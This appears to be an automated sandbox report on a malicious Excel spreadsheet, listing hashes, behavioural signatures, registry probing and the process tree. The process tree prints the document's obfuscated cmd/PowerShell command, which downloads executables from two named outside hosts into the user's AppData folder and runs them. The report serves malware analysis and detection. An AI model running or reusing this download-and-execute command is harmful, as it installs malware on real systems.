Analysis
-
max time kernel
46s -
max time network
43s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
22-07-2024 22:25
Behavioral task
behavioral1
Sample
99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Resource
win10v2004-20240709-en
General
-
Target
99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
-
Size
52KB
-
MD5
86f2a9879de336b1c983755b2615f926
-
SHA1
19250c71f3eb28a6b4e3febef6dfa47a30e3342e
-
SHA256
99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4
-
SHA512
d37da87e8a2e65b17f138540283e005b68016c7a2688889f621858b06cf1362cab8d21a91a4e99c47b87ec996e31c1813a389f45418eee45f91620800e987bcc
-
SSDEEP
1536:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdg6boobYGF7:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdgw
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 5412 2496 CMd.exe 83 -
Blocklisted process makes network request 1 IoCs
flow pid Process 19 5532 powershell.exe -
pid Process 5532 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2496 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5532 powershell.exe 5532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5532 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE 2496 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2496 wrote to memory of 5412 2496 EXCEL.EXE 88 PID 2496 wrote to memory of 5412 2496 EXCEL.EXE 88 PID 5412 wrote to memory of 5532 5412 CMd.exe 91 PID 5412 wrote to memory of 5532 5412 CMd.exe 91
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SYSTEM32\CMd.exeCMd.exe /c "p^ow^Ers^hel^l^.e^xe^ -nO^l -No^Ni^Nt^ -W^IndOws^ 1 -NoprOFIle^ -ex^Ec^u B^Ypa^S^s -Wi^ 1 -N^O^Pr^ $random = N^ew-^O^b^je^ct^ Sy^st^em.^Ran^do^m; Fo^rea^ch($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { t^ry { $fg = $ra^n^do^m.n^e^xt(0, 61132); $pp = '%appdata%\' + $fg + '.exe'; ^(^ne^w-^ob^jec^t s^ys^t^e^m.ne^t^.webcli^en^t)^.D^ow^nl^o^ad^Fi^le($um.ToString(), $pp); St^a^rt-^Pr^oce^ss $pp; b^re^ak; } c^at^ch { Wr^it^e-Ho^st $err^or[0].E^x^cep^ti^on } }"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowErshell.exe -nOl -NoNiNt -WIndOws 1 -NoprOFIle -exEcu BYpaSs -Wi 1 -NOPr $random = New-Object System.Random; Foreach($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { try { $fg = $random.next(0, 61132); $pp = 'C:\Users\Admin\AppData\Roaming\' + $fg + '.exe'; (new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } }3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5532
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
156B
MD56ef02398f62dba21a714f594f1b41c0c
SHA135ff956a403f991440678410da9d62b6af356458
SHA256ebb8bb04e30b3a5e04c087a9e7fca556b76961b42433e52473be40e73afa9cd0
SHA5124758938d0602747b811a8a1e630b9e8a43893ce5e97f73824e627b4c75f6247f4918ccc139cdd148e5ceaaec4b8b58cece67f1f04f5c549fcb140b7e0feb3f14
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD5966172937f36170dafbef1c27fa60cde
SHA14f49c6ecbb49816cef1c807b6b2054d5f7d223c8
SHA25653f4639259085152efcc17392f978db52e7ae473830b2ad317479ffe6fb1c17a
SHA512f4cf0d3172d455fdb247fcf871b57e14343c91a536c17690fe234e2a4a07a42cd326e63fe06c0d247bc388a678ee06680e5c28e7257ef31ceebf16edf15af571